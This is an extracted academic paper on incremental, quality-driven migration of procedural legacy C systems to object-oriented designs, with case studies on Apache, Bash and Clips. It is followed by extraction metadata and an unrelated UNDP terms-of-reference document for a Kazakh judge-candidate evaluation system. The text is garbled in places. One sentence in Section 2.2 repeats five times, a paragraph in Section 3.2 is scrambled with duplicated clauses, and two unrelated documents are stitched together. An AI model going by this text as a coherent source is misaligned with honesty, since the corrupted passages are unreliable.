2.2 Operationalization of Quality Requirements
The migration process can be constructed as a sequence of transformations, as depicted in Figure 1. Each transformation alters the state of the software system by converting a data type to a class candidate, associating a method to a class candidate, and defining inheritance associations. These transformations are repeated till the final object oriented system is obtained. Each transformation affects the features, appearing as leaves in the quality soft-goal graph. Consequently, we consider the transformations have a positive impact on the modeled quality. The objective thus is to identify the optimal combination of transformations that yields the best quality requirements for the target migrant system. We define the migration process as follows.
Definition 1: A quality driven migration process is a tuple $< S, I, F, T, G, V, A, \xrightarrow{a}>$.
- $S$ is a set of non-empty states, $S_0, S_1, ..., S_i, S_{i+1}, ..., S_n$. State, $S_0$, represents the original software system. Other than the initial state, the set $S$ can contain more than one final states that correspond to different resulting migrant systems (i.e. alternative object models), or to an empty state that denotes failure. The states between the initial state and final states represent a snapshot of the migration process whereby a mix of procedural model and object oriented model exist as the system evolves from its original procedural state to a fully object oriented final state.
- $I$ represents the initial state $S_0$.

\[\text{Figure 1. Quality Driven Software Migration Framework}\]
• \( F \) represents a set of final states that correspond to different object models for the initial procedural system.
• \( T \) is a catalogue of transformations, \( t_{0j}, t_{0j}, ..., t_{j,k}, t_{k,j+1}, ..., t_{nk}, \) each of which alters a state and yields a consecutive state. These transformations aim to convert a software system in a stepwise fashion from its initial state (original procedural system) to a final state (new object oriented system). \( t_{ij} \) represents a transformation moving from \( s_i \) to \( s_j \).
• \( G \) is a set of soft-goal interdependency graphs that elaborate high-level non-functional requirements into measurable source code features.
• \( V \) is a set of feature vectors, \( v_{0}, v_{1}, ..., v_{n}, \) in which \( v_{i} \) is a feature vector for \( s_i \) and represented as \( < (f_{1}, a_{1}), (f_{2}, a_{2}), ..., (f_{k}, a_{k}) > \), where \( f_{k} \) is a terminal feature in the soft-goal interdependency graphs, and \( a_{k} \) the metric value of this feature in state \( s_{i} \).
• \( A \) is a set of actions, \( a_{0}, a_{1}, ..., a_{j}, a_{j+1}, ..., a_{n} \), which is a pair of a transformation, \( t_{ij} \), and its quality likelihood, \( \lambda_{ij} \), which indicates that a transformation contributes towards a desired quality goal.
• \( \rightarrow A \times S \times A \times S \) is a set of transformation rules, which define the semantic meaning and constraints for each transformation. Transformations in \( T \) are selected from a transformation rule catalog [5].
As illustrated in Figure 2, a full transformation path can be formed by the composition of transformations from the original state to the final states. For example, we can identify three possible class candidates from the original state to the final states. For example, we can identify three possible class candidates from the original state to the final states. For example, we can identify three possible class candidates from the original state to the final states. For example, we can identify three possible class candidates from the original state to the final states. For example, we can identify three possible class candidates from the original state to the final states.
3. Incremental Migration Process
Legacy software systems are usually large systems. Our proposed approach must scale well to handle the migration of these systems. In this section, we present two enhancements to our quality driven migration approach. Firstly, we present a technique to break a large system into a set of clusters. Each cluster is migrated independently. By applying the proposed quality driven migration framework on the clusters, a partial object model can be identified from each cluster and merged incrementally into a full object model that produces a final migrated system. Secondly, we modify the Viterbi algorithm with constrains on the number of states generated, in order to reduce the search space for the optimal transformation path.
3.1 System Segmentation
To reduce the time and space requirements needed to migrate a large legacy system in one sweep, we break the legacy system into clusters. Most clustering techniques presented in the literature utilize certain criteria to decompose a system into a set of meaningful modular clusters. Such criteria attempt to achieve a cluster with low coupling, high cohesion, minimal interface or sharing. In the context of our research, our objective is to produce clusters that have the least data dependencies on other clusters. This would enable us to migrate clusters independently. Moreover, the order of selecting which cluster to migrate would have no effect on the final object model. To achieve this objective, each cluster contains the maximum number of source code entities that are related to a class candidate. A source code entity that initiates the formation of a cluster is called a seed. Other entities that associate with this seed entity are used to form a cluster.
An association is a directed edge from a seed to its related entities.
A seed, refereed as, \( T_i \), is selected according to its potential to be considered as a class candidate in the final migrated system. In this context, a seed entity can be chosen from aggregate data types, global variable declarations, and function pointer declarations. Specifically, the aggregate data types include `struct` type definitions, `union` type definitions, `arrays`, and `enumeration` definitions. In this case, fields in an aggregate data type become data members in a class candidate. Similarly, a global variable is encapsulated as a data member in a class candidate. Moreover, a function pointer declaration is treated also as a seed entity for the reason that a function pointer declaration defines a type for the functions passed as parameters.
Due to the object oriented design principle that a class encapsulates data and related methods, we focus on the discovery of relations between the seed and other data types and functions that use the seed. These relations can be type references, data updates, or data uses. Specifically, a seed type can be referred by functions and data fields of other data types. The entities associated with the seed are represented as a set of data type declarations, \( \{T_i\} \), and a set of functions \( \{F_i\} \). We define a cluster as a tuple, described in Definition 2.
**Definition 2:** A cluster is represented as a tuple, \( <T_i, M_{T_i}, R_{T_i}> \).
- \( T_i \), the seed of a cluster, has a potential to become a candidate class
- \( M_{T_i} \) is a set of functions that use or update the seed \( T_i \)
- \( R_{T_i} \) is a set of data types that have data fields referred to the seed \( T_i \)
The system decomposition process is conducted in the following steps:
1. Identify the possible seeds;
2. Associate the related entities with each seed;
3. Generate a set of clusters, denoted as a set of tuples, \( \{<T_i, M_{T_i}, R_{T_i}>\} \).
Figure 3 illustrates a result of system segmentation, where three clusters have been identified:
\[
C_0 = <T_0, \{F_0, F_1\}, \{T_1\}>, \\
C_1 = <T_1, \{F_2, F_3\}, \emptyset>, \\
C_2 = <T_2, \{F_3, F_4\}, \{T_4\}>
\]
As illustrated in this example, the system segmentation process allows overlapping entities between clusters. When an overlap occurs on aggregate data types, it may indicate a multiple inheritance relationship among the generated class candidates from each cluster. If an overlap occurs on functions it reflects conflicts in methods. In this case, multiple possible transformation paths can be generated by assigning the methods into alternative class candidates. The migration process framework (described in Section 2) provides a qualitative method to determine the class candidate to attach the function. Finally, to independently select and migrate a cluster without relying on the information in other clusters, shared entities among clusters are duplicated in each cluster. Some functions may not be related to any seeds, these are grouped into a “leftover” cluster.
### 3.2 System Amalgamation
The system segmentation process decomposes the program into a set of smaller clusters, which contain the ASTs of segments of the procedural code to be migrated. In this respect, the migration process is divided into phases, as depicted in Figure 4. Each phase transforms one cluster into an object model. In particular, the initial object model \( OM_0 \) is empty in the first phase. After the transformation of Cluster 1, \( C_1 \), the first object model \( OM_1 \) is generated and serves as input to the second phase, along with a new cluster. Consequently, after each phase a new intermediate Object Model, \( OM_k \), is generated and serves as an input to the following reengineering phase. In this sense, the result from the present phase and the preceding phase are merged, and the new intermediate object model is produced.
The amalgamation process iterates over each cluster, and updates the system object model. The transformations in each cluster are performed in four steps:
1. Generate a new class which is added into the object model;
2. Assign functions from the set of associated functions to the new class candidate, and update the object model;
3. Resolve conflicts when a function can be assigned to either the newly identified class candidate or to existing class candidates in the object model;
In a nutshell, the proposed quality driven migration approach is applied iteratively to every cluster. In each cluster, the migration process is divided into a sequence of states and transformations. During the migration of the first cluster, the initial state represents purely procedural code of the cluster. Once the optimal path in a cluster is identified, the final state from the optimal path in a cluster serves as the initial state for the next cluster. The object model is incrementally expanded by identifying additional classes from the new clusters. For example, the clusters in Figure 3 are used to illustrate the application of the amalgamation algorithm process using the quality driven migration framework. In this example, the amalgamation process is divided into three phases (a phase for each cluster), as depicted in 4. In each phase, one cluster is migrated by following the four steps as described above. The evolution of the object model in each state is specified in Table 1. In Phase 1, cluster $C_0 = \langle T_0, \{F_0, F_1\}, \{T_1\} \rangle$ serves as an input. Two states are generated $\{s_0, s_1\}$. In $s_0$, $T_0$ is identified as a class. In $s_1$, two methods: $F_0$ and $F_1$ are assigned to class $T_0$. In Phase 2, $C_1 = \langle T_1, \{F_2, F_4\}, \emptyset \rangle$ serves as input along with the object model (OM 1) from Phase 1. $T_1$ is identified as a new class from $C_1$ in $s_0$. In $s_1$, two methods: $F_2$ and $F_4$ are assigned to $T_1$. There are no methods in conflict in Phase 2. As shown in Figure 3, $T_1$ is a data type and one or more of its data fields refer to $T_0$. This indicates that an inheritance relation exists between these two types. The class inheritance is determined based on the context of the usage of $T_0$ and $T_1$ in the source code and a set of heuristics. For this example, the class inheritance identification is omitted (see [5]). In Phase 3, $C_2 = \langle T_2, \{F_3, F_4\}, \{T_1\} \rangle$ serves as input to the migration process along with the object model (OM 2) from Phase 2. In $s_0$, $T_2$ is the new class identified from $C_2$. In $s_1$, two methods: $F_3$ and $F_4$ are assigned to $T_2$. $T_2$ and $T_1$ have common method $F_4$. Therefore method $F_4$ is in conflict.
and the newly identified object oriented system can wrap techniques, the rest of the non migrated system considered as a one big component. By the use of Alternatively, the rest of the non migrated system may be as one derived using our migration framework. 2) object oriented design will likely not have as high quality into an object oriented design. This brute force migrated of the class. In this way, the whole system is converted class. The functions in a cluster become public methods into one class. All aggregate types and variable declarations in the cluster become public data attributes of the newly created class. The functions in a cluster become public methods of the class. In this way, the whole system is converted into an object oriented design. This brute force migrated object oriented design will likely not have as high quality as one derived using our migration framework. 2) Alternatively, the rest of the non migrated system may be considered as a one big component. The use of wrapping techniques, the rest of the non migrated system and the newly identified object oriented system can interact using middleware technologies. Various wrapping and middleware technologies are presented in [6].
3.3 Transformation Path Generation
In our quality driven migration approach, we consider that the transformation path with the highest likelihood score to be the path most likely to produce the highest quality in a migrated system. Therefore, a main emphasis of our migration approach is to determine the optimal transformation path. We use the Viterbi algorithm to generate all the transformation paths and identify the optimal path. A drawback of using the Viterbi algorithm is the need to retain all states and paths before identifying an optimal path. In our research, we developed a number of heuristics to reduce the number of generated states and the time required to find the optimal path. These heuristics are essential to permit our approach to migrate large legacy systems with reasonable resource requirements. These heuristics are discussed below.
Transformation rule application constraints
Transformation rules provide means to implement generic migration steps. Each of the rules alters a set of source code features. We associate pre- and post-conditions with each transformation rule to efficiently specify constraints to apply transformation rules in procedural code features.
In the migration process, pre-conditions are the procedural source code features that a transformation can operate on and convert them into object oriented structures, as specified in post-conditions. Therefore, the pre/post conditions indicate the order to apply the transformations on states, and place constraints on the expansion of the optimal transformation path search tree.
Hierarchical state modeling
When a segment of the search tree contains a sequence of states in a single path, these states can be collapsed into one composite state. The likelihood of the composite state is equal to the multiplication of the likelihoods of transformations along the single path inside the composite state. For example, as illustrated in Figure 4, \( s_0 \) and \( s_i \) of Phase 3 can be merged into one state to reduce the number of states generated, because there aren't other states emanating from \( s_0 \). This merging will not affect the choice of the optimal transformation path.
Incremental object model generation
Adopting the incremental migration approach, described in Section 3.2 and 3.3, we reduced the complexity and the space of the optimal transformation path search tree. At each cluster, we concentrate on identifying one class candidate, building the search tree regarding this one class candidate, and updating the system object model incrementally one class at a time.
Implementation considerations
The implementation of the system states is crucial in reducing the complexity of the proposed state transition approach. The main idea is to simplify the representation of states and minimize the space required to retain states in memory.
Sub-optimality to achieve performance
The sub-optimality refers to the number of applied transformations and how well the desired quality objectives are met in the new migrated system. The Viterbi algorithm used to locate the optimal path requires the generation of all possible paths. This limits the applicability of our migration approach, as we may need to generate a large number of paths even for medium size systems. Alternatively, we can use the A* algorithm to locate the optimal path. In this case, not so promising transformations can be also considered with the expectation that they may later produce an optimal result. Therefore we may locate a sub-optimal optimal transformation path. We limit the application of A* only to clusters with large number of states to ensure that we achieve the optimal path for most of the clusters.
4. Case Studies
To investigate the effectiveness of the incremental quality driven migration framework, a comprehensive set of case studies are conducted and presented in this section. The case studies are performed on three medium size open source procedural systems from different domains: 1) The Apache Web Server 2) The BASH Unix Shell and 3) The Clips Expert System Builder. Table 2 illustrates the source code related characteristics of these systems. A prototype software toolkit is developed using the theoretical approach described in this paper.
In this section, we firstly give an overview of the toolkit implementation and highlight the scalability and performance issues that may arise during the migration process. Secondly, we study the efficiency of the system segmentation process. Thirdly, we evaluate complexity of the state transition approach. Finally, we examine the quality of the migrated systems, and verify that the migrated system generated from the optimal path achieves the highest quality.
### 4.1 Incremental Migration Steps
The toolkit implements the proposed incremental quality driven migration in seven steps, as illustrated in Figure 5:
**Step 1:** The original legacy systems is parsed and represented in terms of its Abstract Syntax Tree (AST).
**Step 2:** Using the techniques described in Section 3.1, we decompose the AST into several clusters. Each cluster intends to include extensive source code features relating to a class candidate.
**Step 3:** We defined a generic procedural language domain that contains the common constructs in various procedural languages. Due to space limitation we do not cover this generic procedural language domain [2]. The AST of each cluster is converted to conform to this generic procedural language domain and is represented in XML. In this way, we can use a set of generic transformations that can migrate procedural systems written in different procedural languages into functionally similar object oriented systems. The generated XML documents are placed in a central repository.
**Step 4:** The high-level quality requirements for the target migrant systems are elicited based on domain knowledge, customer interviews or documentation. The focal point is to refine the high-level quality requirements into measurable design decisions and source code features. The refinement process is modeled using soft-goal interdependency graphs.
**Step 5:** The migration process is operated iteratively on each cluster, as described in Section 3.2. For each cluster, we apply the proposed quality driven migration process. We then update the overall system object model with newly identified object model from the processed cluster.
**Step 6:** The quality evaluation process selects the object model with the best quality using the Viterbi algorithm and computes quality improvement likelihood scores. We validate that the target object model achieves the high cohesion and low coupling using object oriented six metrics.
**Step 7:** Once all the clusters are migrated. A final object model is obtained. The object oriented code is generated from the object model with the highest quality.
---
**Table 2. Characteristics of the Procedural Systems**
<table>
<thead>
<tr>
<th>Systems</th>
<th>Apache</th>
<th>Bash</th>
<th>Clips</th>
</tr>
</thead>
<tbody>
<tr>
<td>Lines of Code</td>
<td>37,033</td>
<td>27,521</td>
<td>34,301</td>
</tr>
<tr>
<td>Num. of Files</td>
<td>42</td>
<td>39</td>
<td>40</td>
</tr>
<tr>
<td>Num. of Functions</td>
<td>709</td>
<td>998</td>
<td>736</td>
</tr>
<tr>
<td>Num. of Aggr. Types</td>
<td>184</td>
<td>79</td>
<td>151</td>
</tr>
<tr>
<td>Num. of Global Vars</td>
<td>103</td>
<td>227</td>
<td>186</td>
</tr>
</tbody>
</table>
4.2 Experiments on System Segmentation
In this section, we present experiments that measure the average size of the generated clusters using the system segmentation algorithm. The size of clusters is crucial for the success of a reengineering project due to the amount of computation resources needed. Especially, the representation of Abstract Syntax Trees in an XML format (Step 3) increases the size of the source code representation dramatically. For example, the CLIPS system (34KLOC) represented in XML requires 38MB. Furthermore, due to the possible large size of the procedural system, it may become an intractable task to migrate the entire code of a large system in one sweep. The system segmentation algorithm reduces a large procedural system into a set of manageable clusters. The average disk space for each cluster is illustrated in Figure 6. The X axis represents the number of the clusters. The Y axis refers to the average disk space of a cluster related to the corresponding number of clusters. The values of Y axis are computed using Formula 1. Formula 1 details the calculation of the average size of clusters as shown in Figure 6. The average size of a cluster varies based on the number of clusters counted. The order of clusters measured is based on the order of cluster generation during the segmentation phase. Figure 6 shows several peaks because the generation of clusters of large size increases the average size of clusters.
\[
\text{Average Size of Clusters} = \frac{\sum_{i=1}^{K} \text{Size of Cluster}_i}{K}
\]
where \( K = 1, \ldots, M \), \( M \) is the total number of clusters
The results in Figure 6 illustrate that the average size of clusters is relatively small. For example, the average size for the Apache system is 200 Kbytes, Bash 400 Kbytes, and Clips 400 Kbytes XML clusters. Moreover, the largest size of a cluster is approximately 2MB. The size of the cluster demonstrates that the proposed framework can operate on large systems at a steady rate without extraordinary resource requirements.
4.3 Complexity of the State Transition Approach
In this section, we present the complexity of the state transition approach used to identify an optimal transformation path. Essentially, the complexity of the approach can be measured in three aspects: 1) the number of states generated in a cluster, 2) the time required to process a cluster, 3) the memory needed to represent a state. Our objective is to validate that the incremental migration process can effectively shorten the search space and improve the scalability of the proposed framework.
As discussed in Section 3, the migration is conducted iteratively one cluster at each step. A new class candidate is identified from the initial state and the overall system object model is updated. One method might be assigned into more than one class candidates. When a method assignment conflict is encountered, multiple states are generated to compute the optimal transformation path. To avoid the space explosion, it is critical to resolve conflicts in the scope of one cluster. In this context, the transformation paths are modeled by a binary tree, because the conflicting method is assigned into either class. Moreover, we utilize the heuristics discussed in Section 3.3 to compress the states. Therefore, if there is no method in conflict, only one state exists in the cluster. The number of the states is calculated by Formula (2) where \( i \) refers to the number of methods in conflict.
\[
\text{num.ofstates} = \sum_{i=0}^{n} 2^i
\]
Figure 7 shows the distribution of states generated in the clusters. A large number of the clusters have only one state – 64% for Apache, 36% for Bash, and 27% for Clips. This is due to the state reduction heuristics used in Section 3.3. In addition, these clusters require minimal processing time, as there is no need to perform any optimal transformation path searching in these clusters.
We also examine the average processing time for each cluster. Average processing time includes building a
### Table 3. Average Processing Time for Identifying Optimal Transformation Path
<table>
<thead>
<tr>
<th>Number of States</th>
<th>Apache (ms)</th>
<th>Bash (ms)</th>
<th>Clips (ms)</th>
</tr>
</thead>
<tbody>
<tr>
<td>3</td>
<td>75</td>
<td>155</td>
<td>70</td>
</tr>
<tr>
<td>7</td>
<td>249</td>
<td>230</td>
<td>387</td>
</tr>
<tr>
<td>15</td>
<td>586</td>
<td>348</td>
<td>569</td>
</tr>
<tr>
<td>31</td>
<td>1,582</td>
<td>990</td>
<td>701</td>
</tr>
<tr>
<td>63</td>
<td>2,628</td>
<td>1,656</td>
<td>930</td>
</tr>
<tr>
<td>127</td>
<td>8,687</td>
<td>3,671</td>
<td>3,939</td>
</tr>
<tr>
<td>255</td>
<td>N/A</td>
<td>6,453</td>
<td>5,278</td>
</tr>
<tr>
<td>511</td>
<td>41,968</td>
<td>14,554</td>
<td>4,101</td>
</tr>
<tr>
<td>1023</td>
<td>N/A</td>
<td>17,625</td>
<td>5,766</td>
</tr>
<tr>
<td>2047</td>
<td>N/A</td>
<td>121,562</td>
<td>18,515</td>
</tr>
<tr>
<td>4095</td>
<td>N/A</td>
<td>N/A</td>
<td>50,286</td>
</tr>
<tr>
<td>8191</td>
<td>N/A</td>
<td>123,828</td>
<td>2,099,672</td>
</tr>
</tbody>
</table>
Table 3 summarizes statistics of the states generated while identifying optimal transformation paths among the three examined systems. The table shows the results for the clusters that were processed using the Viterbi algorithm. Clusters with states larger than 8191 (i.e., 12 conflicting methods using formula 2) are processed using the A* algorithm. The processing time for these large clusters is small and as indicated in Figure 7. Moreover, Table 3 shows that the processing time grows linearly.
To measure the memory required to represent the generated states, we examine the space required for one state. The data structure representing one state is illustrated as follows in the class "State". Based on the Java data type definition, the space required for keeping one state is approximately 320 bits (40 bytes) (considering "int" and "reference" take 32 bits, and "String" 160 bits for containing 10 "char" types). Therefore, the cluster with 8,191 states requires approximately 310.9Kbytes to keep all the states in the memory. As a result, the state transition approach does not impose a large memory requirement.
```java
public class State {
// state identification
int stateId;
// id of a conflicting method
String conflingMethodId;
// id of the class candidate that a conflicting method is assigned to
int assignedClassCandidateId;
// a reference to the previous state
State preState;
// a reference to the next child state in the left branch
State leftState;
// a reference to the next child state in the right branch
State rightState;
}
```
### 4.4 Quality Evaluation of the Migrant Systems
In the last two subsections, we presented results that verified that the presented incremental migration approach is scalable and can migrate medium size legacy procedural systems to object oriented systems. In this section, we verify that the approach can generate object oriented system with the highest maintainability and reusability. To achieve this objective, we conduct the case study as follows:
- Select other possible migrated systems and compare their quality with the migrated system generated from the optimal transformation path.
- To compare the quality of systems, collect a set of object oriented metrics to quantify direct measurable features, for example, coupling between classes and cohesion inside a class. The high cohesion and low coupling further indicate high maintainability and reusability.
- Analyze and compare the metric results from different systems.
To select other possible migrations of the same systems, we use the transformation path presented in our incremental migration approach. All transformation paths are generated and ordered in a sequence based on their attached likelihood scores. Several representative target systems can be generated from different paths. In the experiment, every path is assigned with a number in the range of 0 and 1. Such number shows a relative position of a path in the sequence. For example, the path labeled with 1 refers to the optimal path with the highest likelihood. The path labeled with 0 refers to the worst path with the lowest likelihood. Similarly, the path of 0.5 means the medium path whose likelihood is ranked in the middle of the highest likelihood and the lowest one. The path of 0.75 has the likelihood ranked in the middle of the optimal path and the medium path. Likewise, the path of 0.25 has the likelihood ranked in the middle of the medium path and the worst path. In such a way, we can generate five target systems from the paths of 0, 0.25, 0.5, 0.75 and 1. We can then compare the quality of these generated systems with the quality of the optimal migrated system.
To assess whether the desired goals in the target system have been achieved, a set of widely accepted object oriented software metrics are adopted. In the context of object oriented migration, we aim to achieve high cohesion and low coupling in the target object oriented systems. In this respect, coupling between classes can be measured using metrics, such as, CBO (Coupling Between Objects), DCC (Direct Class Coupling) and IFBC (Information Flow Between Classes)[7]. Moreover, the cohesion inside a class can be measured using metrics, such as, TCC (Tight Class Cohesion), Coh (Cohesion Measurement) and IFIC...
Coupling Between Objects (CBO) (low values are better)
Directly Coupled Classes (DCC) (low values are better)
Information Flow Between Classes (IFBC) (low values are better)
Information Flow Inside Class (IFIC) (high values are better)
Lack of Cohension Of Methods (LCOM) (high values are better)
Tight Class Cohesion (TCC) (high values are better)
Path Choice
Apache
Bash
Clips
Figure 7. Comparison of Metric Results from Six Metrics
(Information Flow Inside Class) [7]. To reflect the overall value of the entire system in terms of one specific metric, we calculate the average value of the each metric value from each class. These set of metrics are different from the one we used to compute the transformation likelihoods. The overall results from the aforementioned six metrics are illustrated in Figure 7. The X-axis shows the choices of paths. The Y-axis represents metric values corresponding to the systems generated from the five selected paths. One single metric can not reflect the overall quality of a system. For example, in the Figure about the result of IFIC, the Apache system of 1 has a lower IFIC value than the system of 0.75, but the values of TCC and Coh are higher than the system of 0.75. To compare the overall quality between two alternative systems, we count the number of the metric results which are higher in the optimal system than the others. By combining results from all the metrics, we see that the final object oriented system generated from the optimal path has the highest qualities in comparison to the object oriented systems generated from the alternative paths.
5. Related Work
Several methods for identifying an object model from a legacy system have been defined. In [8] an approach to identify object-oriented model from RPG programs is presented. The class identification is centered around persistent data stores, while related chunks of code of the legacy system become candidate methods. In [9], a semi-automatic tool to migrate PL/I programs into C++ is presented. The abstract syntax tree (AST) is used to analyze the original source code. Consequently, tokens in the AST are transformed into C++. Through a similar approach, an automatic Fortran to C/C++ converter is provided in [10], a Pascal to C++ converter in [11], and methodologies to directly identify C++ classes from procedural code written in C in [12]. Moreover, in [12],
an evidence model is presented to help the user select the best-migrated object model. This evidence model includes state change information, return types, and data flow patterns. However, there is no comprehensive framework for ensuring that the migrated system possesses certain quality characteristics.
Software quality properties reflect the degree of the conformance to specific non-functional requirement. A process-oriented framework to represent non-functional requirements as soft goals is proposed [4]. The framework consists of five major components: a set of goals for representing non-functional requirements that positively or negatively contribute to other goals; a set of link types for relating goals to other languages; a collection of correlation rules for deducing interdependencies between goals; and finally, a labeling procedure which gives a quantitative method to determine any given nonfunctional requirement is being addressed by a set of design decisions. In [13], a quality-driven software reengineering framework is proposed. The framework aims to associate specific soft goals, such as performance and maintainability with transformations and guide software reengineering process. This work focuses on providing a catalog of transformations to refactor object oriented code to produce better object oriented designs using design patterns. We provide an approach that focuses on the process of software migration of procedural code to object oriented platforms. We aim to refine high level quality goals such as maintainability and reusability into low level source code features (metrics) in the target object oriented systems. Moreover, we devise a quantitative method to assess the likelihood of each transformation to achieve desired quality goals and generate target object oriented systems with the highest quality.
6. Conclusion
This paper presents techniques and methodologies for the incremental migration of procedural legacy systems into object oriented platforms. We define a quality driven migration framework to monitor and evaluate quality attributes at each step of the migration process. Such migration process involves the representation of procedural code using XML, the recovery of the object model from a procedural system, and the incorporation of non-functional requirement into the migration process. A system segmentation technique is provided to decompose a system into a collection of clusters, and consequently divide the migration process into phases. In such a way, a large system can be reengineered gradually in order to reduce the risk and computation costs involved. The approach has been used to migrate a number of open source projects. The obtained results demonstrate the effectiveness, usefulness, and scalability of our framework.
Currently, the proposed framework is applied in migrate legacy systems written in C and Fortran to C++. On-going work focuses on applying the proposed framework in more generic software transformation context, such as refactoring, restructuring and development process.
Acknowledgment
I would like to thank my Ph.D. thesis supervisor, Dr. Kostas Kontogiannis for his valuable contribution to this paper.
References
|
{"Source-Url": "http://post.queensu.ca/~zouy/files/icsm-zou-2004.pdf", "len_cl100k_base": 9200, "olmocr-version": "0.1.49", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 36082, "total-output-tokens": 10278, "length": "2e13", "weborganizer": {"__label__adult": 0.00029277801513671875, "__label__art_design": 0.0002872943878173828, "__label__crime_law": 0.0002655982971191406, "__label__education_jobs": 0.0005650520324707031, "__label__entertainment": 4.1365623474121094e-05, "__label__fashion_beauty": 0.00011599063873291016, "__label__finance_business": 0.0001652240753173828, "__label__food_dining": 0.0002455711364746094, "__label__games": 0.0004558563232421875, "__label__hardware": 0.0005645751953125, "__label__health": 0.0002608299255371094, "__label__history": 0.00016057491302490234, "__label__home_hobbies": 6.16908073425293e-05, "__label__industrial": 0.00025582313537597656, "__label__literature": 0.00016987323760986328, "__label__politics": 0.00017011165618896484, "__label__religion": 0.00028824806213378906, "__label__science_tech": 0.00501251220703125, "__label__social_life": 5.835294723510742e-05, "__label__software": 0.00403594970703125, "__label__software_dev": 0.98583984375, "__label__sports_fitness": 0.00022351741790771484, "__label__transportation": 0.0002856254577636719, "__label__travel": 0.00014531612396240234}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45575, 0.03335]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45575, 0.50221]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45575, 0.9071]], "google_gemma-3-12b-it_contains_pii": [[0, 4250, false], [4250, 9400, null], [9400, 13393, null], [13393, 17833, null], [17833, 20100, null], [20100, 25030, null], [25030, 28577, null], [28577, 32622, null], [32622, 37888, null], [37888, 40285, null], [40285, 45575, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4250, true], [4250, 9400, null], [9400, 13393, null], [13393, 17833, null], [17833, 20100, null], [20100, 25030, null], [25030, 28577, null], [28577, 32622, null], [32622, 37888, null], [37888, 40285, null], [40285, 45575, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45575, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45575, null]], "pdf_page_numbers": [[0, 4250, 1], [4250, 9400, 2], [9400, 13393, 3], [13393, 17833, 4], [17833, 20100, 5], [20100, 25030, 6], [25030, 28577, 7], [28577, 32622, 8], [32622, 37888, 9], [37888, 40285, 10], [40285, 45575, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45575, 0.1117]]}
|
olmocr_science_pdfs
|
2024-11-24
|
2024-11-24
|
a8276cb00a4bbced3df478f63c3258c998961db6
|
TERMS OF REFERENCE
Service Name: Development of Information system to automate the evaluation of Judge Candidates
Project number and title: 123513 – Institutional support for the Astana Public Service Hub
Contract Type: Contract for Services (UNDP Format)
Location: Kazakhstan, at the location of the company (roundtrip for 1 person to Nur-Sultan is envisaged)
Contract Duration: 3 months from the signing of the UNDP-format Contract (expected May-July 2022)
Background:
The Astana Civil Service Hub (hub), an initiative of the Government of Kazakhstan and the United Nations Development Program, was established in 2013 by 25 countries and 5 international organizations, which unanimously adopted the Declaration on the Establishment of the Astana Hub. Currently, the Hub consists of 42 member states. The Hub is a multi-stakeholder platform to promote civil service efficiency by supporting participating governments’ efforts to build institutional and human capacity through its main pillars of partnership and networking; capacity building and peer-to-peer learning; research and knowledge management. In line with its mission, the hub provides technical support to state bodies and organizations of the Republic of Kazakhstan.
In order to improve the impartiality of the judicial candidate selection, the development of an information system is required to encrypt the papers of judicial candidates and to automate the system of their evaluation by the examiners.
The system will improve the fairness of the candidates’ selection, because after the candidates write essays and cases, the system will automatically encrypt the papers and send them to the assessors. The evaluators, in turn, will not even know who they are evaluating.
Currently, candidates write papers manually by signing their work. The Board Office staff then copies the candidate’s work and sends it to the assessors. Thus, there are currently significant risks of violating the principles of meritocracy when selecting future judges.
The new system will be aimed at improving the procedure for the selection of judges.
Objective:
The objective is to develop an information system to automate the judicial candidate evaluation system for the Supreme Judicial Council.
Scope of Work:
- Developing the information system software;
- Installation of the information system on the Customer’s infrastructure that meets technical requirements (the Supreme Judicial Council of the Republic of Kazakhstan);
- Replication of the system and training of the system administrators;
- Pilot operation of the information system.
Methodological Support:
Terms & Abbreviations:
SW - Software;
DB - Database;
IS - Information System;
IT - Information Technology;
OS - Operating System;
The contractor will automate all aspects of activities related to writing and reviewing essays and case studies.
Workstations of the System users shall be designed on “Thin Client” Technology, which does not require installation of application software on users’ personal computers and eliminates the cost of creating workstations for users.
In addition, for users with limited access to the Internet, the application software vendor will need to develop a user workstation organized without access to the Internet.
The vendor shall ensure implementation of all stages of the System, including:
1) Developing the System’s application software;
2) Development of technical working documentation (User’s Guide, Administrator’s Guide);
3) Conducting preliminary tests;
4) Implementation of the System in all facilities specified by the Client:
• Training of System Administrators (up to 5 Administrators);
• Introduction into trial operation;
• Refinement of the System following the trial operation results;
• Internal acceptance testing;
• Transfer of open-source codes to the depository of the authorized state body
5) Maintenance of the System,
6) Warranty maintenance of the System and expert review of regulatory and technical documentation of the project.
All work related to the development and implementation of the System shall be carried out in accordance with the standards corresponding to the current GOSTs of the Republic of Kazakhstan:
- GOST 34.003-90. Information technology. Set of standards for automated systems. Automated systems. Terms and definitions;
- GOST 34.601-90. Set of standards for automated systems. Automated systems. Design stages;
- GOST 34.201-89. Set of standards for automated systems. Types, completeness and designation of documents when creating automated systems;
- ST RK 34.015-2002. Set of standards for automated systems. Terms of Reference for the creation of an automated system;
- GOST 34.603-92. Information technologies. Types of automatic systems tests;
**The main purpose of the system:**
- Registration and accounting of candidates for writing essays and solving case problems;
- Providing the opportunity to perform case tasks, simulating the judicial practice;
- Providing the opportunity to write essays;
- Generating the roster of candidates who passed the additional means of competitive selection;
